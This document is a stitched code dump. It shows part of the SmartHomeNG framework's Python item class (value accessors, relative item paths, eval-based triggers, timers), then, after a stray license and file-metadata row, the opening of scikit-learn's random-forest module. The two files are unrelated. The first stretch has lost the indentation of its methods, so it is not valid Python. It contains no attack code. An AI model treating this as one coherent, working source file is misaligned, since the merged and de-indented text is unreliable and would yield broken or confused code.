if delta.total_seconds() < 0.0001:
return 0.0
return delta.total_seconds()
def _get_prev_update_by(self):
return 'N/A'
def _get_prev_value(self):
return self.__prev_value
"""
Following are methods to get attributes of the item
"""
def path(self):
"""
Path of the item
Available only in SmartHomeNG v1.6, not in versions above
:return: String with the path of the item
:rtype: str
"""
return self.property.path
def id(self):
"""
Old method name - Use item.path() instead of item.id()
"""
return self.property.path
def type(self):
"""
Datatype of the item
:return: Datatype of the item
:rtype: str
"""
return self.property.type
def last_change(self):
"""
Timestamp of last change of item's value
:return: Timestamp of last change
"""
return self.property.last_change
def age(self):
"""
Age of the item's actual value. Returns the time in seconds since the last change of the value
:return: Age of the value
:rtype: int
"""
return self.property.last_change_age
def last_update(self):
"""
Timestamp of last update of item's value (not necessarily change)
:return: Timestamp of last update
"""
return self.property.last_update
def update_age(self):
"""
Update-age of the item's actual value. Returns the time in seconds since the value has been updated (not necessarily changed)
:return: Update-age of the value
:rtype: int
"""
return self.property.last_update_age
def prev_change(self):
"""
Timestamp of the previous (next-to-last) change of item's value
:return: Timestamp of previous change
"""
return self.property.prev_change
def prev_age(self):
"""
Age of the item's previous value. Returns the time in seconds the item had the the previous value
:return: Age of the previous value
:rtype: int
"""
return self.property.prev_change_age
def prev_update(self):
"""
Timestamp of previous (next-to-last) update of item's value (not necessarily change)
:return: Timestamp of previous update
"""
return self.property.prev_update
def prev_update_age(self):
"""
Update-age of the item's previous value. Returns the time in seconds the previous value existed
since it had been updated (not necessarily changed)
:return: Update-age of the previous value
:rtype: int
"""
return self.property.prev_update_age
def prev_value(self):
"""
Next-to-last value of the item
:return: Next-to-last value of the item
"""
return self.property.last_value
def changed_by(self):
"""
Returns an indication, which plugin, logic or event changed the item's value
:return: Changer of item's value
:rtype: str
"""
return self.property.last_change_by
def updated_by(self):
"""
Returns an indication, which plugin, logic or event updated (not necessarily changed) the item's value
:return: Updater of item's value
:rtype: str
"""
return self.property.last_update_by
"""
Following are methods to handle relative item paths
"""
def get_absolutepath(self, relativepath, attribute=''):
    """
    Builds an absolute item path relative to the current item

    Leading dots select the reference level: the first dot anchors the path
    at this item, each additional dot ascends one level towards the root.

    :param relativepath: string with the relative item path
    :param attribute: string with the name of the item's attribute, which contains the relative path (for log entries)
    :return: string with the absolute item path
    """
    # Non-strings and paths not starting with '.' are treated as already absolute
    if not isinstance(relativepath, str):
        return relativepath
    if (len(relativepath) == 0) or ((len(relativepath) > 0) and (relativepath[0] != '.')):
        return relativepath
    relpath = relativepath.rstrip()
    rootpath = self._path
    # Consume leading dots; every dot after the first strips one trailing
    # component from rootpath (ascend one level in the item tree)
    while (len(relpath) > 0) and (relpath[0] == '.'):
        relpath = relpath[1:]
        if (len(relpath) > 0) and (relpath[0] == '.'):
            if rootpath.rfind('.') == -1:
                if rootpath == '':
                    # Already above the top level: drop the relative part and complain
                    relpath = ''
                    logger.error(
                        "{}.get_absolutepath(): Relative path trying to access above root level on attribute '{}'".format(
                            self._path, attribute))
                else:
                    rootpath = ''
            else:
                rootpath = rootpath[:rootpath.rfind('.')]
    # Join the remaining relative part onto the (possibly shortened) root
    if relpath != '':
        if rootpath != '':
            rootpath += '.' + relpath
        else:
            rootpath = relpath
    logger.info(
        "{}.get_absolutepath('{}'): Result = '{}' (for attribute '{}')".format(self._path, relativepath, rootpath,
                                                                               attribute))
    # Strip a '.self' marker from the result
    # NOTE(review): replace() removes EVERY '.self' occurrence, not only the
    # trailing one - a path segment literally named 'self' earlier in the
    # path would be mangled; confirm this is intended
    if rootpath[-5:] == '.self':
        rootpath = rootpath.replace('.self', '')
    rootpath = rootpath.replace('.self.', '.')
    return rootpath
def expand_relativepathes(self, attr, begintag, endtag):
    """
    converts a configuration attribute containing relative item paths
    to absolute paths

    The item's attribute can be of type str or list (of strings).
    The begintag and the endtag remain in the result string!

    :param attr: Name of the attribute. Use * as a wildcard at the end
    :param begintag: string or list of strings that signals the beginning of a relative path is following
    :param endtag: string or list of strings that signals the end of a relative path
    """
    def __checkforentry(attr):
        # Expand one config entry in place: strings directly, lists element by element
        if isinstance(self.conf[attr], str):
            if (begintag != '') and (endtag != ''):
                # Paths are embedded, delimited by begintag/endtag
                self.conf[attr] = self.get_stringwithabsolutepathes(self.conf[attr], begintag, endtag, attr)
            elif (begintag == '') and (endtag == ''):
                # The whole value is a (possibly relative) item path
                self.conf[attr] = self.get_absolutepath(self.conf[attr], attr)
        elif isinstance(self.conf[attr], list):
            logger.debug("expand_relativepathes(1): to expand={}".format(self.conf[attr]))
            new_attr = []
            for a in self.conf[attr]:
                # Convert accidentally wrong dict entries to string
                if isinstance(a, dict):
                    a = list("{!s}:{!s}".format(k, v) for (k, v) in a.items())[0]
                logger.debug("expand_relativepathes: before : to expand={}".format(a))
                if (begintag != '') and (endtag != ''):
                    a = self.get_stringwithabsolutepathes(a, begintag, endtag, attr)
                elif (begintag == '') and (endtag == ''):
                    a = self.get_absolutepath(a, attr)
                logger.debug("expand_relativepathes: after: to expand={}".format(a))
                new_attr.append(a)
            self.conf[attr] = new_attr
            logger.debug("expand_relativepathes(2): expanded={}".format(self.conf[attr]))
        else:
            # Neither str nor list: nothing we can expand
            logger.warning("expand_relativepathes: attr={} can not expand for type(self.conf[attr])={}".format(attr, type(self.conf[attr])))

    # Check if wildcard is used
    if isinstance(attr, str) and attr[-1:] == "*":
        for entry in self.conf:
            if attr[:-1] in entry:
                __checkforentry(entry)
    elif attr in self.conf:
        __checkforentry(attr)
    return
def get_stringwithabsolutepathes(self, evalstr, begintag, endtag, attribute=''):
    """
    converts a string containing relative item paths
    to a string with absolute item paths

    The begintag and the endtag remain in the result string!

    :param evalstr: string with the statement that may contain relative item paths
    :param begintag: string (or list of strings) that signals the beginning of a relative path is following
    :param endtag: string (or list of strings) that signals the end of a relative path
    :param attribute: string with the name of the item's attribute, which contains the relative path
    :return: string with the statement containing absolute item paths
    """
    def __checkfortags(evalstr, begintag, endtag):
        # Scan evalstr left to right; every begintag immediately followed by
        # '.' starts a relative path that is translated via get_absolutepath()
        pref = ''
        rest = evalstr
        while (rest.find(begintag + '.') != -1):
            pref += rest[:rest.find(begintag + '.') + len(begintag)]
            rest = rest[rest.find(begintag + '.') + len(begintag):]
            if endtag == '':
                # No end marker: the remainder of the string is the path
                rel = rest
                rest = ''
            else:
                rel = rest[:rest.find(endtag)]
                rest = rest[rest.find(endtag):]
            pref += self.get_absolutepath(rel, attribute)
        pref += rest
        logger.debug("{}.get_stringwithabsolutepathes('{}') with begintag = '{}', endtag = '{}': result = '{}'".format(
            self._path, evalstr, begintag, endtag, pref))
        return pref

    if not isinstance(evalstr, str):
        return evalstr

    if isinstance(begintag, list):
        # Fill end or begintag with empty tags if list length is not equal
        diff_len = len(begintag) - len(endtag)
        begintag = begintag + [''] * abs(diff_len) if diff_len < 0 else begintag
        endtag = endtag + [''] * diff_len if diff_len > 0 else endtag
        # Bugfix: pref must be defined even when NONE of the begintags occur
        # in evalstr - previously that case raised UnboundLocalError at the
        # final 'return pref' (the scalar branch below has an early return,
        # the list branch did not).
        pref = evalstr
        for i, _ in enumerate(begintag):
            if not evalstr.find(begintag[i] + '.') == -1:
                evalstr = __checkfortags(evalstr, begintag[i], endtag[i])
                pref = evalstr
    else:
        if evalstr.find(begintag + '.') == -1:
            return evalstr
        pref = __checkfortags(evalstr, begintag, endtag)
    return pref
def _get_attr_from_parent(self, attr):
    """
    Look up a configuration attribute on the parent item.

    :param attr: name of the attribute to read from the parent's config
    :return: the parent's value for ``attr``, or '' if the attribute is not set
    """
    parent = self.return_parent()
    return parent.conf.get(attr, '')
def _get_attr_from_grandparent(self, attr):
    """
    Look up a configuration attribute on the grandparent item.

    :param attr: name of the attribute to read from the grandparent's config
    :return: the grandparent's value for ``attr``, or '' if the attribute is not set
    """
    pitem = self.return_parent()
    gpitem = pitem.return_parent()
    # Bugfix: read from the GRANDparent's config dict. Previously this was
    # 'pitem.get(attr, '')' - it queried the parent instead of gpitem and
    # called a non-existent .get() method instead of .conf.get(), unlike the
    # sibling _get_attr_from_parent().
    gpattr_value = gpitem.conf.get(attr, '')
    return gpattr_value
def _build_trigger_condition_eval(self, trigger_condition):
    """
    Build conditional eval expression from trigger_condition attribute

    The outer list entries are OR-ed together; the conditions inside one
    entry are AND-ed. Entries keyed 'value' are skipped here (handled
    elsewhere - TODO confirm).

    :param trigger_condition: list of condition dicts
    :return: eval-able Python expression string
    """
    wrk_eval = []
    for or_cond in trigger_condition:
        for ckey in or_cond:
            if ckey.lower() == 'value':
                # not part of the boolean expression
                pass
            else:
                and_cond = []
                for cond in or_cond[ckey]:
                    wrk = cond
                    # Turn a lone '=' into '==' (leave ==, <=, >=, =<, => alone)
                    if (wrk.find('=') != -1) and (wrk.find('==') == -1) and \
                            (wrk.find('<=') == -1) and (wrk.find('>=') == -1) and \
                            (wrk.find('=<') == -1) and (wrk.find('=>') == -1):
                        wrk = wrk.replace('=', '==')
                    # Normalize true/false spellings to Python's True/False
                    # (only the first occurrence of each is rewritten)
                    p = wrk.lower().find('true')
                    if p != -1:
                        wrk = wrk[:p] + 'True' + wrk[p + 4:]
                    p = wrk.lower().find('false')
                    if p != -1:
                        wrk = wrk[:p] + 'False' + wrk[p + 5:]
                    # expand relative item paths
                    wrk = self.get_stringwithabsolutepathes(wrk, 'sh.', '(', KEY_CONDITION)
                    and_cond.append(wrk)
                wrk = ') and ('.join(and_cond)
                if len(or_cond[ckey]) > 1:
                    wrk = '(' + wrk + ')'
                wrk_eval.append(wrk)
    result = ') or ('.join(wrk_eval)
    if len(trigger_condition) > 1:
        result = '(' + result + ')'
    return result
def __call__(self, value=None, caller='Logic', source=None, dest=None):
    """
    Read (no value given) or write (value given) the item's value.

    Read access returns a deep copy so callers cannot mutate the stored
    value. Write access runs through the eval trigger queue when an eval
    expression is configured, otherwise updates directly.

    :param value: new value, or None for read access
    :param caller: originator of the change
    :param source: source of the change (for logging/triggering)
    :param dest: destination of the change (for logging/triggering)
    """
    if value is None or self._type is None:
        # read access (or untyped item)
        return copy.deepcopy(self._value)
    if self._eval:
        # defer the update so the eval expression runs in the scheduler
        args = {'value': value, 'caller': caller, 'source': source, 'dest': dest}
        self._sh.trigger(name=self._path + '-eval', obj=self.__run_eval, value=args, by=caller, source=source, dest=dest)
    else:
        self.__update(value, caller, source, dest)
def __iter__(self):
    # Iterating an item yields its direct child items
    for child in self.__children:
        yield child
def __setitem__(self, item, value):
    """Dict-style write access to instance attributes: ``obj[name] = value``."""
    self.__dict__[item] = value
def __getitem__(self, item):
    """Dict-style read access to instance attributes: ``obj[name]``."""
    return self.__dict__[item]
def __bool__(self):
    """The item's truth value follows the truth value of its current value."""
    return True if self._value else False
def __str__(self):
    # The item's (short) name is its string representation
    return self._name
def __repr__(self):
    # Unambiguous representation including the full item path
    return "Item: {}".format(self._path)
def _init_prerun(self):
    """
    Build eval expressions from special functions and triggers before first run

    Called from Items.load_itemdefinitions
    """
    if self._trigger:
        # Only if item has an eval_trigger
        _items = []
        for trigger in self._trigger:
            # Hoisted: match_items() was previously called twice per trigger
            # (once for the empty-check, once for extend)
            matched = _items_instance.match_items(trigger)
            if matched == [] and self._eval:
                logger.warning("item '{}': trigger item '{}' not found for function '{}'".format(self._path, trigger, self._eval))
            _items.extend(matched)
        # Register this item with every matched trigger item
        for item in _items:
            if item != self:  # prevent loop
                item._items_to_trigger.append(self)
        if self._eval:
            # Build eval statement from trigger items (joined by given function)
            items = ['sh.' + str(x.id()) + '()' for x in _items]
            if self._eval == 'and':
                self._eval = ' and '.join(items)
            elif self._eval == 'or':
                self._eval = ' or '.join(items)
            elif self._eval == 'sum':
                self._eval = ' + '.join(items)
            elif self._eval == 'avg':
                self._eval = '({0})/{1}'.format(' + '.join(items), len(items))
            elif self._eval == 'max':
                self._eval = 'max({0})'.format(','.join(items))
            elif self._eval == 'min':
                self._eval = 'min({0})'.format(','.join(items))
def _init_start_scheduler(self):
    """
    Start schedulers of the items which have a crontab or a cycle attribute

    up to version 1.5 of SmartHomeNG the schedulers were started when initializing the item. That
    could lead to a scheduler to fire a routine, which references an item which is not yet initialized

    :return:
    """
    #############################################################
    # Crontab/Cycle
    #############################################################
    if self._crontab is not None or self._cycle is not None:
        cycle = self._cycle
        if cycle is not None:
            # normalize the cycle definition into the dict form the scheduler expects
            cycle = self._build_cycledict(cycle)
        self._sh.scheduler.add(self._itemname_prefix + self._path, self, cron=self._crontab, cycle=cycle)
    return
def _init_run(self):
    """
    Run initial eval to set an initial value for the item

    Called from Items.load_itemdefinitions
    """
    if self._trigger:
        # Only if item has an eval_trigger
        if self._eval:
            # Only if item has an eval expression
            self._sh.trigger(name=self._path, obj=self.__run_eval, by='Init', value={'value': self._value, 'caller': 'Init'})
def __run_eval(self, value=None, caller='Eval', source=None, dest=None):
    """
    evaluate the 'eval' entry of the actual item

    If a trigger_condition is configured it is evaluated first; the item's
    eval expression only runs when the condition holds.
    """
    if self._eval:
        # Test if a conditional trigger is defined
        if self._trigger_condition is not None:
            try:
                # 'sh' must be in scope for the eval'd condition expression
                sh = self._sh
                cond = eval(self._trigger_condition)
                logger.warning("Item {}: Condition result '{}' evaluating trigger condition {}".format(self._path, cond, self._trigger_condition))
            except Exception as e:
                logger.warning("Item {}: problem evaluating trigger condition {}: {}".format(self._path, self._trigger_condition, e))
                return
        else:
            cond = True
        if cond == True:
            # 'sh', 'shtime' and 'mymath' are made available to the eval'd expression
            sh = self._sh  # noqa
            shtime = self.shtime
            import math as mymath
            try:
                value = eval(self._eval)
            except Exception as e:
                logger.warning("Item {}: problem evaluating {}: {}".format(self._path, self._eval, e))
            else:
                if value is None:
                    logger.debug("Item {}: evaluating {} returns None".format(self._path, self._eval))
                else:
                    # NOTE(review): hard-coded debug hook for one specific item
                    # path - looks like leftover development code
                    if self._path == 'wohnung.flur.szenen_helper':
                        logger.info("__run_eval: item = {}, value = {}".format(self._path, value))
                    self.__update(value, caller, source, dest)
# New for on_update / on_change
def _run_on_xxx(self, path, value, on_dest, on_eval, attr='?'):
    """
    common method for __run_on_update and __run_on_change

    Evaluates on_eval; when the result is not None it is either written to
    the destination item (on_dest) or, without a destination, the
    expression is re-evaluated for its side effect.

    :param path: path to this item (NOTE(review): unused - the method reads
        self._path directly; confirm before removing)
    :param value: current item value (used for log output only)
    :param on_dest: destination item path ('' for expression-only entries)
    :param on_eval: expression to evaluate
    :param attr: Descriptive text for origin of update of item
    :type: path: str
    :type attr: str
    """
    # NOTE(review): hard-coded debug hook for one specific item path -
    # looks like leftover development code
    if self._path == 'wohnung.flur.szenen_helper':
        logger.info("_run_on_xxx: item = {}, value = {}".format(self._path, value))
    # 'sh' must be in scope for the eval'd expression
    sh = self._sh
    logger.info("Item {}: '{}' evaluating {} = {}".format(self._path, attr, on_dest, on_eval))
    try:
        dest_value = eval(on_eval)  # calculate to test if expression computes and see if it computes to None
    except Exception as e:
        logger.warning("Item {}: '{}' item-value='{}' problem evaluating {}: {}".format(self._path, attr, value, on_eval, e))
    else:
        if dest_value is not None:
            # expression computes and does not result in None
            if on_dest != '':
                dest_item = _items_instance.return_item(on_dest)
                if dest_item is not None:
                    dest_item.__update(dest_value, caller=attr, source=self._path)
                    logger.debug(" - : '{}' finally evaluating {} = {}, result={}".format(attr, on_dest, on_eval, dest_value))
                else:
                    logger.error("Item {}: '{}' has not found dest_item '{}' = {}, result={}".format(self._path, attr, on_dest, on_eval, dest_value))
            else:
                # NOTE(review): on_eval is evaluated a SECOND time here; if the
                # expression has side effects they happen twice - confirm intended
                dummy = eval(on_eval)
                logger.debug(" - : '{}' finally evaluating {}, result={}".format(attr, on_eval, dest_value))
        else:
            logger.debug(" - : '{}' {} not set (cause: eval=None)".format(attr, on_dest))
    pass
def __run_on_update(self, value=None):
    """
    evaluate all 'on_update' entries of the actual item

    :param value: the value that was just set (passed through for logging)
    """
    if self._on_update:
        sh = self._sh  # noqa
        # destination paths and expressions are parallel lists
        for on_update_dest, on_update_eval in zip(self._on_update_dest_var, self._on_update):
            self._run_on_xxx(self._path, value, on_update_dest, on_update_eval, 'on_update')
def __run_on_change(self, value=None):
    """
    evaluate all 'on_change' entries of the actual item

    :param value: the value that was just set (passed through for logging)
    """
    if self._on_change:
        sh = self._sh  # noqa
        # destination paths and expressions are parallel lists
        for on_change_dest, on_change_eval in zip(self._on_change_dest_var, self._on_change):
            self._run_on_xxx(self._path, value, on_change_dest, on_change_eval, 'on_change')
def __trigger_logics(self, source_details=None):
    # Trigger every logic registered for this item; the source dict tells
    # the logic which item fired and why (details = changed_by/updated_by)
    source={'item': self._path, 'details': source_details}
    for logic in self.__logics_to_trigger:
        logic.trigger(by='Item', source=source, value=self._value)
def __update(self, value, caller='Logic', source=None, dest=None):
    """
    Core value update: cast, store, log and fire all triggers.

    Handles change detection, timestamp bookkeeping, on_update/on_change
    handlers, method/logic/item triggers, threshold crossing, cache
    persistence and re-arming of the autotimer.

    :param value: new value (cast to the item's type first)
    :param caller: originator of the change
    :param source: source of the change
    :param dest: destination of the change
    """
    try:
        value = self.cast(value)
    except:
        try:
            logger.warning('Item {}: value "{}" does not match type {}. Via {} {}'.format(self._path, value, self._type, caller, source))
        except:
            pass
        return
    self._lock.acquire()
    _changed = False
    # every call counts as an update ...
    self.__prev_update = self.__last_update
    self.__last_update = self.shtime.now()
    self.__updated_by = "{0}:{1}".format(caller, source)
    trigger_source_details = self.__updated_by
    if value != self._value or self._enforce_change:
        # ... but only a differing value (or enforce_change) counts as a change
        _changed = True
        self.__prev_value = self.__last_value
        self.__last_value = self._value
        self._value = value
        self.__prev_change = self.__last_change
        self.__last_change = self.__last_update
        self.__changed_by = "{0}:{1}".format(caller, source)
        trigger_source_details = self.__changed_by
        if caller != "fader":
            self._fading = False
            self._lock.notify_all()
            self._change_logger("Item {} = {} via {} {} {}".format(self._path, value, caller, source, dest))
            if self._log_change_logger is not None:
                log_src = ''
                if source is not None:
                    log_src += ' (' + source + ')'
                log_dst = ''
                if dest is not None:
                    log_dst += ', dest: ' + dest
                self._log_change_logger.info("Item Change: {} = {} - caller: {}{}{}".format(self._path, value, caller, log_src, log_dst))
    self._lock.release()
    # on_update handlers run for every update, changed or not
    self.__run_on_update(value)
    if _changed or self._enforce_updates or self._type == 'scene':
        # on_change handlers and all registered triggers
        self.__run_on_change(value)
        for method in self.__methods_to_trigger:
            try:
                method(self, caller, source, dest)
            except Exception as e:
                logger.exception("Item {}: problem running {}: {}".format(self._path, method, e))
        if self._threshold and self.__logics_to_trigger:
            # with a threshold configured, logics fire only on bound crossings
            if self.__th_crossed and self._value <= self.__th_low:  # cross lower bound
                self.__th_crossed = False
                self._threshold_data[2] = self.__th_crossed
                self.__trigger_logics(trigger_source_details)
            elif not self.__th_crossed and self._value >= self.__th_high:  # cross upper bound
                self.__th_crossed = True
                self._threshold_data[2] = self.__th_crossed
                self.__trigger_logics(trigger_source_details)
        elif self.__logics_to_trigger:
            self.__trigger_logics(trigger_source_details)
        # queue eval runs for all items that trigger on this one
        for item in self._items_to_trigger:
            args = {'value': value, 'source': self._path}
            self._sh.trigger(name=item.id(), obj=item.__run_eval, value=args, by=caller, source=source, dest=dest)
    if _changed and self._cache and not self._fading:
        try:
            cache_write(self._cache, self._value)
        except Exception as e:
            # Bugfix: message used to read "could update cache" although it
            # reports a failure
            logger.warning("Item: {}: could not update cache {}".format(self._path, e))
    if self._autotimer and caller != 'Autotimer' and not self._fading:
        # re-arm the autotimer; entries [2]/[3] optionally name items that
        # supply the duration / value dynamically
        _time, _value = self._autotimer[0]
        compat = self._autotimer[1]
        if self._autotimer[2]:
            try:
                _time = eval('self._sh.' + self._autotimer[2] + '()')
            except:
                logger.warning("Item '{}': Attribute 'autotimer': Item '{}' does not exist".format(self._path, self._autotimer[2]))
        if self._autotimer[3]:
            try:
                _value = self._castvalue_to_itemtype(eval('self._sh.' + self._autotimer[3] + '()'), compat)
            except:
                logger.warning("Item '{}': Attribute 'autotimer': Item '{}' does not exist".format(self._path, self._autotimer[3]))
        self._autotimer[0] = (_time, _value)  # for display of active/last timer configuration in backend
        next = self.shtime.now() + datetime.timedelta(seconds=_time)
        self._sh.scheduler.add(self._itemname_prefix + self.id() + '-Timer', self.__call__, value={'value': _value, 'caller': 'Autotimer'}, next=next)
def add_logic_trigger(self, logic):
    """
    Add a logic trigger to the item

    The logic will be triggered whenever the item's value changes.

    :param logic: logic object to register
    :return:
    """
    self.__logics_to_trigger.append(logic)
def remove_logic_trigger(self, logic):
    # Unregister a previously added logic trigger (raises ValueError if absent)
    self.__logics_to_trigger.remove(logic)
def get_logic_triggers(self):
    """
    Returns a list of logics to trigger, if the item gets changed

    Note: the internal list itself is returned, not a copy.

    :return: Logics to trigger
    :rtype: list
    """
    return self.__logics_to_trigger
def add_method_trigger(self, method):
    # Register a callable invoked as method(item, caller, source, dest) on change
    self.__methods_to_trigger.append(method)
def remove_method_trigger(self, method):
    # Unregister a previously added method trigger (raises ValueError if absent)
    self.__methods_to_trigger.remove(method)
def get_method_triggers(self):
    """
    Returns a list of item methods to trigger, if this item gets changed

    Note: the internal list itself is returned, not a copy.

    :return: methods to trigger
    :rtype: list
    """
    return self.__methods_to_trigger
def autotimer(self, time=None, value=None, compat=ATTRIB_COMPAT_V12):
    """
    Arm or disarm the item's autotimer.

    With both a time and a value given the autotimer is armed; without
    either of them it is switched off.

    :param time: duration after which the value is (re)set
    :param value: value the autotimer sets
    :param compat: compatibility mode for value casting
    """
    if time is None or value is None:
        self._autotimer = False
    else:
        self._autotimer = [(time, value), compat, None, None]
def fade(self, dest, step=1, delta=1):
    """
    Fade the item's value stepwise towards a destination value.

    The actual fading is performed by the scheduled fadejob.

    :param dest: target value (converted to float)
    :param step: step size per iteration
    :param delta: seconds between iterations (assumed - TODO confirm against fadejob)
    """
    dest = float(dest)
    self._sh.trigger(self._path, fadejob, value={'item': self, 'dest': dest, 'step': step, 'delta': delta})
def remove_timer(self):
    # Remove a pending '-Timer' scheduler entry for this item
    self._sh.scheduler.remove(self._itemname_prefix + self.id() + '-Timer')
def return_children(self):
    # Generator over the item's direct child items
    for child in self.__children:
        yield child
def return_parent(self):
    # The containing item one level up in the item tree
    return self.__parent
def set(self, value, caller='Logic', source=None, dest=None, prev_change=None, last_change=None):
    """
    Set the item's value directly, bypassing triggers.

    Unlike the regular update path this performs no on_update/on_change
    handling, no logic/method triggering and no cache write.

    :param value: new value (cast to the item's type first)
    :param caller: originator of the change
    :param source: source of the change (logged only)
    :param dest: destination of the change (logged only)
    :param prev_change: override for the previous-change timestamp (None = use last change)
    :param last_change: override for the last-change timestamp (None = now)
    """
    try:
        value = self.cast(value)
    except:
        try:
            logger.warning("Item {}: value {} does not match type {}. Via {} {}".format(self._path, value, self._type, caller, source))
        except:
            pass
        return
    self._lock.acquire()
    self._value = value
    if prev_change is None:
        self.__prev_change = self.__last_change
    else:
        self.__prev_change = prev_change
    if last_change is None:
        self.__last_change = self.shtime.now()
    else:
        self.__last_change = last_change
    # NOTE(review): source is formatted as None here, unlike the regular
    # update path which records the actual source - confirm intended
    self.__changed_by = "{0}:{1}".format(caller, None)
    self.__updated_by = "{0}:{1}".format(caller, None)
    self._lock.release()
    self._change_logger("Item {} = {} via {} {} {}".format(self._path, value, caller, source, dest))
def timer(self, time, value, auto=False, compat=ATTRIB_COMPAT_DEFAULT):
    """
    Schedule the item to be set to a value after a duration.

    :param time: duration until the value is set (parsed by _cast_duration)
    :param value: value to set when the timer fires
    :param auto: if True, also arm the autotimer so the timer recurs
    :param compat: compatibility mode for value casting
    """
    time = self._cast_duration(time)
    value = self._castvalue_to_itemtype(value, compat)
    if auto:
        caller = 'Autotimer'
        self._autotimer = [(time, value), compat, None, None]
    else:
        caller = 'Timer'
    # schedule a one-shot job that calls the item with the target value
    next = self.shtime.now() + datetime.timedelta(seconds=time)
    self._sh.scheduler.add(self._itemname_prefix + self.id() + '-Timer', self.__call__, value={'value': value, 'caller': caller}, next=next)
def get_children_path(self):
    # Paths of all direct child items
    return [item._path
            for item in self.__children]
def jsonvars(self):
    """
    Translate the item's state into a plain dict for JSON serialization.

    :return: Key / Value pairs describing the item
    """
    data = {}
    data["id"] = self._path
    data["name"] = self._name
    data["value"] = self._value
    data["type"] = self._type
    data["attributes"] = self.conf
    data["children"] = self.get_children_path()
    return data
# alternative method to get all class members
# @staticmethod
# def get_members(instance):
# return {k: v
# for k, v in vars(instance).items()
# if str(k) in ["_value", "conf"] }
# #if not str(k).startswith('_')}
def to_json(self):
    """Serialize the :meth:`jsonvars` dict as pretty-printed, key-sorted JSON."""
    payload = self.jsonvars()
    return json.dumps(payload, sort_keys=True, indent=2)
| gpl-3.0 |
djgagne/scikit-learn | sklearn/ensemble/forest.py | 176 | 62555 | """Forest of trees-based ensemble methods
Those methods include random forests and extremely randomized trees.
The module structure is the following:
- The ``BaseForest`` base class implements a common ``fit`` method for all
the estimators in the module. The ``fit`` method of the base ``Forest``
class calls the ``fit`` method of each sub-estimator on random samples
(with replacement, a.k.a. bootstrap) of the training set.
The init of the sub-estimator is further delegated to the
``BaseEnsemble`` constructor.
- The ``ForestClassifier`` and ``ForestRegressor`` base classes further
implement the prediction logic by computing an average of the predicted
outcomes of the sub-estimators.
- The ``RandomForestClassifier`` and ``RandomForestRegressor`` derived
classes provide the user with concrete implementations of
the forest ensemble method using classical, deterministic
``DecisionTreeClassifier`` and ``DecisionTreeRegressor`` as
sub-estimator implementations.
- The ``ExtraTreesClassifier`` and ``ExtraTreesRegressor`` derived
classes provide the user with concrete implementations of the
forest ensemble method using the extremely randomized trees
``ExtraTreeClassifier`` and ``ExtraTreeRegressor`` as
sub-estimator implementations.
Single and multi-output problems are both handled.
"""
# Authors: Gilles Louppe <g.louppe@gmail.com>
# Brian Holt <bdholt1@gmail.com>
# Joly Arnaud <arnaud.v.joly@gmail.com>
# Fares Hedayati <fares.hedayati@gmail.com>
#
# License: BSD 3 clause
from __future__ import division
import warnings
from warnings import warn
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy.sparse import issparse
from ..base import ClassifierMixin, RegressorMixin
from ..externals.joblib import Parallel, delayed
from ..externals import six
from ..feature_selection.from_model import _LearntSelectorMixin
from ..metrics import r2_score
from ..preprocessing import OneHotEncoder
from ..tree import (DecisionTreeClassifier, DecisionTreeRegressor,
ExtraTreeClassifier, ExtraTreeRegressor)
from ..tree._tree import DTYPE, DOUBLE
from ..utils import check_random_state, check_array, compute_sample_weight
from ..utils.validation import DataConversionWarning, NotFittedError
from .base import BaseEnsemble, _partition_estimators
from ..utils.fixes import bincount
__all__ = ["RandomForestClassifier",
"RandomForestRegressor",
"ExtraTreesClassifier",
"ExtraTreesRegressor",
"RandomTreesEmbedding"]
MAX_INT = np.iinfo(np.int32).max
def _generate_sample_indices(random_state, n_samples):
    """Private function used to _parallel_build_trees function.

    Draws a bootstrap sample: n_samples indices sampled with replacement
    from range(n_samples).
    """
    rng = check_random_state(random_state)
    return rng.randint(0, n_samples, n_samples)
def _generate_unsampled_indices(random_state, n_samples):
    """Private function used to forest._set_oob_score function.

    Returns the indices that were NOT drawn by the bootstrap sample
    generated with the same random_state (the out-of-bag samples).
    """
    drawn = _generate_sample_indices(random_state, n_samples)
    counts = bincount(drawn, minlength=n_samples)
    return np.arange(n_samples)[counts == 0]
def _parallel_build_trees(tree, forest, X, y, sample_weight, tree_idx, n_trees,
                          verbose=0, class_weight=None):
    """Private function used to fit a single tree in parallel."""
    if verbose > 1:
        print("building tree %d of %d" % (tree_idx + 1, n_trees))

    if forest.bootstrap:
        n_samples = X.shape[0]
        if sample_weight is None:
            curr_sample_weight = np.ones((n_samples,), dtype=np.float64)
        else:
            curr_sample_weight = sample_weight.copy()

        # Emulate the bootstrap draw by scaling each sample's weight with
        # the number of times it was drawn
        indices = _generate_sample_indices(tree.random_state, n_samples)
        sample_counts = bincount(indices, minlength=n_samples)
        curr_sample_weight *= sample_counts

        if class_weight == 'subsample':
            # deprecated alias; silence the deprecation warning from
            # compute_sample_weight('auto', ...)
            with warnings.catch_warnings():
                warnings.simplefilter('ignore', DeprecationWarning)
                curr_sample_weight *= compute_sample_weight('auto', y, indices)
        elif class_weight == 'balanced_subsample':
            curr_sample_weight *= compute_sample_weight('balanced', y, indices)

        tree.fit(X, y, sample_weight=curr_sample_weight, check_input=False)
    else:
        # no bootstrap: fit on the full training set with given weights
        tree.fit(X, y, sample_weight=sample_weight, check_input=False)

    return tree
def _parallel_helper(obj, methodname, *args, **kwargs):
    """Private helper to workaround Python 2 pickle limitations"""
    bound_method = getattr(obj, methodname)
    return bound_method(*args, **kwargs)
class BaseForest(six.with_metaclass(ABCMeta, BaseEnsemble,
                                    _LearntSelectorMixin)):
    """Base class for forests of trees.

    Warning: This class should not be used directly. Use derived classes
    instead.
    """

    @abstractmethod
    def __init__(self,
                 base_estimator,
                 n_estimators=10,
                 estimator_params=tuple(),
                 bootstrap=False,
                 oob_score=False,
                 n_jobs=1,
                 random_state=None,
                 verbose=0,
                 warm_start=False,
                 class_weight=None):
        super(BaseForest, self).__init__(
            base_estimator=base_estimator,
            n_estimators=n_estimators,
            estimator_params=estimator_params)

        self.bootstrap = bootstrap
        self.oob_score = oob_score
        self.n_jobs = n_jobs
        self.random_state = random_state
        self.verbose = verbose
        self.warm_start = warm_start
        self.class_weight = class_weight

    def apply(self, X):
        """Apply trees in the forest to X, return leaf indices.

        Parameters
        ----------
        X : array-like or sparse matrix, shape = [n_samples, n_features]
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.

        Returns
        -------
        X_leaves : array_like, shape = [n_samples, n_estimators]
            For each datapoint x in X and for each tree in the forest,
            return the index of the leaf x ends up in.
        """
